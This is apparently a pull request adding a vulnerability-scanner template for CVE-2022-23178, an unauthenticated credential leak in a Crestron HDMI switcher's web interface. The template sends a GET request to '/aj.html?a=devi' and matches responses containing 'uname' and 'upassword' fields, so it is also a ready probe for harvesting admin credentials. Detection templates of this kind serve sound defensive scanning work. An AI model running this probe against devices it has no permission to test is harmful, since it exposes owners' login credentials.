### PR TITLE
Create CVE-2022-23178.yaml

### DIFF
--- a/cves/2022/CVE-2022-23178.yaml
+++ b/cves/2022/CVE-2022-23178.yaml
@@ -6,8 +6,9 @@ info:
   severity: critical
   description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-23178
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23178
+    - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
   tags: cve,cve2022,crestron,disclosure
 
 requests:
@@ -22,7 +23,8 @@ requests:
           - 200
 
       - type: word
+        part: body
         words:
-          - "uname"
-          - "upassword"
+          - '"uname":'
+          - '"upassword":'
         condition: and

--- a/cves/2022/CVE-2022-23178.yaml
+++ b/cves/2022/CVE-2022-23178.yaml
@@ -1,0 +1,28 @@
+id: CVE-2022-23178
+
+info:
+  name: Crestron Device - Credentials Disclosure
+  author: gy741
+  severity: critical
+  description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23178
+    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
+  tags: cve,cve2022,crestron,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/aj.html?a=devi"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "uname"
+          - "upassword"
+        condition: and


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2022-23178

```
An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
```

- References: https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO